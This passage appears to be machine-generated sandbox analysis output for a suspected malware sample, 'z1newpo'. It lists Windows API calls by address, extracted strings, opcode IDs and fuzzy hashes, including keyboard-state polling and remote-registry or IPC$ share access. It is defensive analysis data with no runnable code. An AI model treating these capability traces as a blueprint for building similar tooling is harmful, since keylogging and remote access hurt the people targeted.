                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 455036304-4153970271
                                                    • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                    • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                    • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                    • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                    APIs
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                    • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                    • _memmove.LIBCMT ref: 00467EB8
                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                    • _memmove.LIBCMT ref: 00467F6C
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                    • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                    • String ID:
                                                    • API String ID: 2170234536-0
                                                    • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                    • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                    • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                    • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00453CE0
                                                    • SetKeyboardState.USER32(?), ref: 00453D3B
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                    • GetKeyState.USER32(000000A0), ref: 00453D75
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                    • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                    • GetKeyState.USER32(00000011), ref: 00453DEF
                                                    • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                    • GetKeyState.USER32(00000012), ref: 00453E26
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                    • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                    • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                    • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                    • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                    • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                    • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                    • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                    • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                    • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                    • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                    • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                    • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                    • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                    • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                    • DeleteObject.GDI32(?), ref: 0047151E
                                                    • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                    • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                    • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                    • DeleteObject.GDI32(?), ref: 004715EA
                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                    • String ID:
                                                    • API String ID: 3218148540-0
                                                    • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                    • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                    • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                    • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                    • String ID:
                                                    • API String ID: 136442275-0
                                                    • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                    • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                    • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                    • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                    APIs
                                                    • _wcsncpy.LIBCMT ref: 00467490
                                                    • _wcsncpy.LIBCMT ref: 004674BC
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • _wcstok.LIBCMT ref: 004674FF
                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                    • _wcstok.LIBCMT ref: 004675B2
                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                    • _wcslen.LIBCMT ref: 00467793
                                                    • _wcscpy.LIBCMT ref: 00467641
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • _wcslen.LIBCMT ref: 004677BD
                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                    • String ID: X
                                                    • API String ID: 3104067586-3081909835
                                                    • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                    • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                    • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                    • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                    • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                    • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                    • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                    • _wcslen.LIBCMT ref: 0046CDB0
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                    • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                    • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                      • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                      • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                      • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 0046CEA6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 440038798-2785691316
                                                    • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                    • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                    • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                    • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                    • _wcslen.LIBCMT ref: 004610A3
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                    • GetWindowRect.USER32(?,?), ref: 00461248
                                                      • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                    • String ID: ThumbnailClass
                                                    • API String ID: 4136854206-1241985126
                                                    • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                    • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                    • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                    • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                    APIs
                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                    • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                    • GetClientRect.USER32(?,?), ref: 00471A1A
                                                    • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                    • String ID: 2
                                                    • API String ID: 1331449709-450215437
                                                    • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                    • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                    • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                    • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                    • __swprintf.LIBCMT ref: 00460915
                                                    • __swprintf.LIBCMT ref: 0046092D
                                                    • _wprintf.LIBCMT ref: 004609E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                    • API String ID: 3054410614-2561132961
                                                    • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                    • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                    • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                    • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                    • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                    • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                    • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 600699880-22481851
                                                    • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                    • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                    • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                    • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DestroyWindow
                                                    • String ID: static
                                                    • API String ID: 3375834691-2160076837
                                                    • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                    • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                    • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                    • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                    • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                    • API String ID: 2907320926-3566645568
                                                    • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                    • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                    • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                    • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                    APIs
                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                    • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                    • DeleteObject.GDI32(00520000), ref: 00470A04
                                                    • DestroyIcon.USER32(004E004F), ref: 00470A1C
                                                    • DeleteObject.GDI32(D006F933), ref: 00470A34
                                                    • DestroyWindow.USER32(0047004E), ref: 00470A4C
                                                    • DestroyIcon.USER32(?), ref: 00470A73
                                                    • DestroyIcon.USER32(?), ref: 00470A81
                                                    • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 1237572874-0
                                                    • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                    • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                    • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                    • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                    • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                    • VariantInit.OLEAUT32(?), ref: 004793E1
                                                    • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                    • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                    • VariantClear.OLEAUT32(?), ref: 00479489
                                                    • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                    • VariantClear.OLEAUT32(?), ref: 004794CA
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
